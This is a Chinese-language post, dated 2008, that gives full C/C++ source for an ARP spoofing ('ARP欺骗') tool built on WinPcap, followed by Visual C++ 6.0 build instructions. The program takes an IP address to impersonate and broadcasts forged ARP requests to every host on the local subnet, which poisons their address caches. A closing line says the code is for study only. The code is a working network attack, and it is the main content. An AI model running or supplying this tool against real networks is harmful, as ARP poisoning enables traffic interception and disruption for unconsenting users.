ARP欺骗源码（基于WinPcap实现）   佟强  2008.10.8

1. //ArpCheat.h
3. #ifndef MY_ARP_CHEAT_INCLUDE_H
4. #define MY_ARP_CHEAT_INCLUDE_H
7. //字节对齐必须是1
8. #pragma pack (1)
9. struct ethernet_head
10. {
11.  unsigned char dest_mac[6];  //目标主机MAC地址
12.  unsigned char source_mac[6]; //源端MAC地址
13.  unsigned short eh_type;   //以太网类型
14. };
16. struct arp_head
17. {
18.  unsigned short hardware_type; //硬件类型：以太网接口类型为1
19.  unsigned short protocol_type; //协议类型：IP协议类型为0X0800
20.  unsigned char add_len;   //硬件地址长度：MAC地址长度为6B
21.  unsigned char pro_len;   //协议地址长度：IP地址长度为4B
22.  unsigned short option;   //操作：ARP请求为1，ARP应答为2
23.  unsigned char sour_addr[6];  //源MAC地址：发送方的MAC地址
24.  unsigned long sour_ip;   //源IP地址：发送方的IP地址
25.  unsigned char dest_addr[6];  //目的MAC地址：ARP请求中该字段没有意义；ARP响应中为接收方的MAC地址
26.  unsigned long dest_ip;   //目的IP地址：ARP请求中为请求解析的IP地址；ARP响应中为接收方的IP地址
27.  unsigned char padding[18];
28. };
30. struct arp_packet     //最终arp包结构
31. {
32.  ethernet_head eth;    //以太网头部
33.  arp_head arp;     //arp数据包头部
34. };
35. #pragma pack ()
36. /**
37. * 获得网卡的MAC地址
38. * pDevName 网卡的设备名称
39. */
40. unsigned char* GetSelfMac(char* pDevName);
41. /**
42. * 封装ARP请求包
43. * source_mac 源MAC地址
44. * srcIP 源IP
45. * destIP 目的IP
46. */
47. unsigned char* BuildArpPacket(unsigned char* source_mac, 
49.                        unsigned long srcIP, unsigned long destIP);
53. #endif
59. //ArpCheat.cpp
60. #include <stdio.h>
61. #include <pcap.h>
62. #include <conio.h>
63. #include <packet32.h>
64. #include <ntddndis.h>
65. #include "ArpCheat.h"
67. int main(int argc,char* argv[]){
68.  pcap_if_t *alldevs;              //全部网卡列表
69.  pcap_if_t *d;                    //一个网卡
70.  int inum;                        //用户选择的网卡序号
71.  int i=0;                         //循环变量
72.  pcap_t *adhandle;                //一个pcap实例
73.  char errbuf[PCAP_ERRBUF_SIZE];   //错误缓冲区
74.  unsigned char *mac;              //本机MAC地址
75.  unsigned char *packet;           //ARP包
76.  unsigned long fakeIp;            //要伪装成的IP地址
77.  pcap_addr_t *pAddr;               //网卡地址
78.  unsigned long ip;                //IP地址
79.  unsigned long netmask;           //子网掩码
81.  if(argc!=2){
82.   printf("Usage: %s inet_addr/n",argv[0]);
83.   return -1;
84.  }
86.  //从参数列表获得要伪装的IP地址
87.  fakeIp = inet_addr(argv[1]);
88.  if(INADDR_NONE==fakeIp){
89.   fprintf(stderr,"Invalid IP: %s/n",argv[1]);
90.   return -1;
91.  }
92.     
93.     /* 获得本机网卡列表 */
94.     if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
95.     {
96.         fprintf(stderr,"Error in pcap_findalldevs: %s/n", errbuf);
97.         exit(1);
98.     }
99.     
100.     /* 打印网卡列表 */
101.     for(d=alldevs; d; d=d->next)
102.     {
103.         printf("%d", ++i);
104.         if (d->description)
105.             printf(". %s/n", d->description);
106.         else
107.             printf(". No description available/n");
108.     }
109.     //如果没有发现网卡
110.     if(i==0)
111.     {
112.         printf("/nNo interfaces found! Make sure WinPcap is installed./n");
113.         return -1;
114.     }
115.     //请用户选择一个网卡
116.     printf("Enter the interface number (1-%d):",i);
117.     scanf("%d", &inum);
118.     
119.    //如果用户选择的网卡序号超出有效范围，则退出
120.     if(inum < 1 || inum > i)
121.     {
122.         printf("/nInterface number out of range./n");
123.         /* Free the device list */
124.         pcap_freealldevs(alldevs);
125.         return -1;
126.     }
130.     
131.     /* 移动指针到用户选择的网卡 */
132.     for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
133.     
134.     mac = GetSelfMac(d->name+8); //+8以去掉"rpcap://"
136.     printf("发送ARP欺骗包，本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) 试图伪装成%s/n",
137.            mac[0],mac[1],mac[2],mac[3],mac[4],mac[5],argv[1]);
141.  /* 打开网卡 */
142.     if ( (adhandle= pcap_open(d->name,          // name of the device
143.                               65536,            // portion of the packet to capture
144.                               0,                //open flag
145.                               1000,             // read timeout
146.                               NULL,             // authentication on the remote machine
147.                               errbuf            // error buffer
148.                               ) ) == NULL)
149.     {
150.         fprintf(stderr,"/nUnable to open the adapter. %s is not supported by WinPcap/n",
151.                  d->name);
152.         /* Free the device list */
153.         pcap_freealldevs(alldevs);
154.         return -1;
155.     }
157.  for(pAddr=d->addresses; pAddr; pAddr=pAddr->next){
158.   //得到用户选择的网卡的一个IP地址
159.   ip = ((struct sockaddr_in *)pAddr->addr)->sin_addr.s_addr;
160.   //得到该IP地址对应的子网掩码
161.   netmask = ((struct sockaddr_in *)(pAddr->netmask))->sin_addr.S_un.S_addr;
162.   if (!ip || !netmask){
163.    continue;
164.   }
165.   //看看这个IP和要伪装的IP是否在同一个子网
166.   if((ip&netmask)!=(fakeIp&netmask)){
167.    continue; //如果不在一个子网，继续遍历地址列表
168.   }
170.   unsigned long netsize = ntohl(~netmask); //网络中主机数
171.   unsigned long net = ip & netmask; //子网地址
173.   for(unsigned long n=1; n<netsize; n++){
174.    //第i台主机的IP地址，网络字节顺序
175.    unsigned long destIp = net | htonl(n);
176.    //构建假的ARP请求包，达到本机伪装成给定的IP地址的目的
177.    packet = BuildArpPacket(mac,fakeIp,destIp);
178.    if(pcap_sendpacket(adhandle, packet, 60)==-1){
179.      fprintf(stderr,"pcap_sendpacket error./n");
180.    }
181.   }
183.  }
185.  return 0;
186. }
187. /**
188. * 获得网卡的MAC地址
189. * pDevName 网卡的设备名称
190. */
191. unsigned char* GetSelfMac(char* pDevName){
193.  static u_char mac[6];
195.  memset(mac,0,sizeof(mac));
197.  LPADAPTER lpAdapter =   PacketOpenAdapter(pDevName);
199.  if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
200.  {
201.   return NULL;
202.  }
204.  PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));
205.  if (OidData == NULL) 
206.  {
207.   PacketCloseAdapter(lpAdapter);
208.   return NULL;
209.  }
210.  // 
211.  // Retrieve the adapter MAC querying the NIC driver
212.  //
213.  OidData->Oid = OID_802_3_CURRENT_ADDRESS;
215.  OidData->Length = 6;
216.  memset(OidData->Data, 0, 6);
217.  BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
218.  if(Status)
219.  {
220.   memcpy(mac,(u_char*)(OidData->Data),6);
221.  }
222.  free(OidData);
223.  PacketCloseAdapter(lpAdapter);
224.  return mac;
226. }
228. /**
229. * 封装ARP请求包
230. * source_mac 源MAC地址
231. * srcIP 源IP
232. * destIP 目的IP
233. */
234. unsigned char* BuildArpPacket(unsigned char* source_mac, 
235.                       unsigned long srcIP,unsigned long destIP)
236. {
237.  static struct arp_packet packet;
239.  //目的MAC地址为广播地址，FF-FF-FF-FF-FF-FF
240.  memset(packet.eth.dest_mac,0xFF,6); 
241.  //源MAC地址
242.  memcpy(packet.eth.source_mac,source_mac,6);
243.  //上层协议为ARP协议，0x0806
244.  packet.eth.eh_type = htons(0x0806);
246.  //硬件类型，Ethernet是0x0001
247.  packet.arp.hardware_type = htons(0x0001);
248.  //上层协议类型，IP为0x0800
249.  packet.arp.protocol_type = htons(0x0800);
250.  //硬件地址长度：MAC地址长度为0x06
251.  packet.arp.add_len = 0x06;
252.  //协议地址长度：IP地址长度为0x04
253.  packet.arp.pro_len = 0x04;
254.  //操作：ARP请求为1
255.  packet.arp.option = htons(0x0001);
256.  //源MAC地址
257.  memcpy(packet.arp.sour_addr,source_mac,6);
258.  //源IP地址
259.  packet.arp.sour_ip = srcIP;
260.  //目的MAC地址，填充0
261.  memset(packet.arp.dest_addr,0,6);
262.  //目的IP地址
263.  packet.arp.dest_ip = destIP;
264.  //填充数据，18B
265.  memset(packet.arp.padding,0,18);
267.  return (unsigned char*)&packet;
269. }

VC++ 6.0 中使用WinPcap

1. 下载并安装WinPcap，安装之后在目录”C:/WINDOWS/system32“下WinPcap添加了Packet.dll、wpcap.dll。
2. 增加WinPcap的include和lib路径：
   Tools→Options→Directories，其中include文件的路径增加WinPcap的include路径（其中有pcap.h等头文件），library文件的路径增加WinPcap的lib路径（其中有Packet.lib和wpcap.lib）。
3. 增加项目的静态链接库：
   Project→Settings→Link→Object/library Modules，在文本框的末尾添加”wpcap.lib packet.lib ws2_32.lib“。
4. 增加预编译信息：
   Project→Settings→C/C++→Preprocessor definitions，在文本框的末尾添加”WPCAP,HAVE_REMOTE“。

     仅供交流学习之用，请勿在真实网络环境中使用。